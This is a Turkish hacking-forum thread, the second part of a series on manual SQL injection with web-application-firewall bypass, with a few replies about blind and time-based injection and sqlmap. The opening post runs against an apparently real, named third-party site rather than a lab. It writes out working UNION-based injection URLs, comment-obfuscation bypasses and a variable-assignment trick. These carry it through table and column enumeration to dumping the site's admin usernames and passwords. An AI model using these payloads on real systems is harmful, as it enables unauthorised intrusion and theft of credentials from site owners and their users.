Manuel SQL İnjection Waf Denemeleri #2

'T0YB0X

'T0YB0X

Katılımcı Üye
8 Ocak 2017
934
465
C:\Program Files (x86)\
Merhaba Arkadaşlar basitten zora doğru bulduğum siteler de manuel SQL injection yaparak waf bypass nasıl geçelecegini seri olarak yapıcaz demiştik buda serinin 2'ncisi olarak devam ediyoruz.

Hedef site:

Kod: 
[COLOR="red"]http://caap.aero/n.php?id=8[/COLOR]

Bu konumuzda Kolon sayılarını bulmayı geçiyorum. Bir önceki konuda kolon sayılarını da nasıl bulacağımız mevcut.

Direk olarak sayıları ekrana yazdıralım.

Kod: 
[COLOR="red"]http://caap.aero/n.php?id=-8'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+-[/COLOR]

iaE72j.png


Sayılarımızı yansıttığımıza göre;
Ben 2 numarayı seçiyorum.
Evet DB user ve versiyon öğrendik. Fakat database() adını hiç bir şekilde çekemedim.

Kod: 
[COLOR="Red"]http://caap.aero/n.php?id=-8'UNION SELECT 1,group_concat(0x7665727369796f6e3a,version(),0x223c62723e22,0x64625f757365723a3a,user(),0x223c62723e22),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+-[/COLOR]

0ZqYFv.png


Kod: 
[COLOR="red"]http://caap.aero/n.php?id=-8'UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+information_schema.tables--+-[/COLOR]

Herkesin bildiği gibi ilerliyorum ve gone waf çıkıyor yine önümüze.

BuvWcF.png


Kod: 
[COLOR="red"]http://caap.aero/n.php?id=-8'UNION SELECT 1,/*!50000group_concat(/*!50000table_name/*_/*/)/*_/*/,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+/*!50000from/_/*/+/*!50000information_schema.tables/_/*/--+-[/COLOR]

BuvWcF.png


Waf bypass kodlarımızı denedik ama verimli bir sonuç alamadık. Bu (/*!12345*/,/*!13337*/ bypass ile de olmuyor.)
bununla bir kaç saatimi uğraştım ve sonunda şu şekilde yapabildim.

Arkadaşlar burada yansıtabileceğimiz sayıları görüyoruz değil mi? Programlama dilleri bilen arkadaşlarım bilir değişken atama ve çağırma meselesini aklıma bu geldi ve denedim..

Tekradan dönüyoruz sayıları yansıttığımız yere

Kod: 
[COLOR="red"]http://caap.aero/n.php?id=-8'UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+-[/COLOR]

iaE72j.png


Örnek verelim hemen 2 sayısına 123 yazalım ve bakalım neler oluyor.
Kodumuz

Kod: 
[COLOR="red"]http://caap.aero/n.php?id=-8'UNION SELECT 1,123,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+-[/COLOR]

Evet bakın 123 yazdık ve ekrana 123 yazdı. Bu demek oluyor ki biz buna bir değişken atarsak o değişkeni de istediğimiz şekilde çağırabiliriz, tabi gone waff araya girmezse :)

dWZ2WK.png


Kod: 
[COLOR="red"]http://caap.aero/n.php?id=-8' and MOD(29,9) DIV @x:=(123)UNION SELECT 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+-[/COLOR]

Evet arkadaşlar değişkenimiz (@x) ve değişkenimizi bu şekilde sayfaya çağırdık.

VFuVsz.png


Şimdi de normal işlemlerimize geri dönüyoruz ve tablolarımızı çağırıyoruz.
Kod: 
Not 0x223c62723e22 = "<br>" hexlenmiş halidir.

Wafsız yazdığımızda gone waf çıkıyor yine karşımıza, bende bypassladım tabloları yazdırmayı başardım.

Kod: 
[COLOR="red"]http://caap.aero/n.php?id=-8' and MOD(29,9) DIV @x:=(+select+group_concat(table_name,0x223c62723e22)+/*!50000from*/+/*!50000information_schema.tables*/+/*!50000where*/+/*!50000table_schema*/=/*!50000database()*/)UNION SELECT 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+-[/COLOR]

9x1JOv.png


Herkesin bildiği yoldan ilerledim ve Şimdi de kolonlarımızı yansıttık.

Kod: 
[COLOR="red"]http://caap.aero/n.php?id=-8' and MOD(29,9) DIV @x:=(+select+group_concat(column_name,0x223c62723e22)+/*!50000from*/+/*!50000information_schema.columns*/+/*!50000where*/+/*!50000table_name*/=0x61646d696e5f7573756172696f73)UNION SELECT 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+-[/COLOR]

GzpWZZ.png


Evet arkadaşlar şimdi sıra geldi Dump etmeye.

Kod: 
[COLOR="red"]http://caap.aero/n.php?id=-8' and MOD(29,9) DIV @x:=(+select+group_concat(nombre,0x3a,clave,0x223c62723e22)+/*!50000from*/+admin_usuarios)UNION SELECT 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--+-[/COLOR]

IJ7CC8.png



2 seride bu kadar arkadaşlar bir sonraki seride görüşmek üzere.





Önceki Konu;
https://www.turkhackteam.org/web-se...-manuel-sql-injection-waf-denemeleri-1-a.html
 
Son düzenleme:
ѕeleɴια

ѕeleɴια

Kıdemli Üye
18 May 2018
2,619
905
ZYZZ
Konu güzel elinize sağlık :)) Ama şöyle daha güzel olabilir. Bu yöntem UNIONSqli de geçiyor. BlindSqli ve TimeBased ne olacak. Daha çok onlar karşımıza çıkıyor örneğin veri tabanında basit bir algoritma olsun şu şekilde ;

id= request.get ('id')
query = " SELECT * From xxx Where id=" id
result = db.execute(query)
print("ASDASD")

Bu algoritmada herhangi bir koşul sorguları bulunmamakta. Değer doğru veya yanlış fark etmezsizin bize ASDASD verecek. Bu algoritmanın kandırılması mümkün bide bunun waflı olduğunu düşünsek.

Edit : İlerleyen seviyelerde bekliyorum bu olayı bende tam kavrayamadım
 
Son düzenleme:
'T0YB0X

'T0YB0X

Katılımcı Üye
8 Ocak 2017
934
465
C:\Program Files (x86)\
ѕeleɴια;9305654' Alıntı:
Konu güzel elinize sağlık :)) Ama şöyle daha güzel olabilir. Bu yöntem UNIONSqli de geçiyor. BlindSqli ve TimeBased ne olacak. Daha çok onlar karşımıza çıkıyor örneğin veri tabanında basit bir algoritma olsun şu şekilde ;

id= request.get ('id')
query = " SELECT * From xxx Where id=" id
result = db.execute(query)
print("ASDASD")

Bu algoritmada herhangi bir koşul sorguları bulunmamakta. Değer doğru veya yanlış fark etmezsizin bize ASDASD verecek. Bu algoritmanın kandırılması mümkün bide bunun waflı olduğunu düşünsek.

Edit : İlerleyen seviyelerde bekliyorum bu olayı bende tam kavrayamadım
Genişletmek için tıkla ...

Beklersen elbette gelicek bu seri baya uzun ve zaman isteyen bir seri. Zamanla yavaş yavaş bütün hepsini seriye dahil edeceğim. Fakat tam olarak ne şu zaman diyemem. Ama en kısa sürede algoritmaların hepsi gelecektir. Konuların başında da dediğim gibi kolaydan zora doğru girmekdeyim.
 
U

Ugroon ++

Katılımcı Üye
13 Ara 2020
306
76
192.168.1.1
Ellerine sağlık.

Şu WAF lerden çektiğimiz var :)

Bir şey soracağım. Bu zamana kadar çoğu zaman sqlmap bypass etmez diye hep manuel test yaptım. Sqlmap bypass yapar mı ?
 
Moderatör tarafında düzenlendi:
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.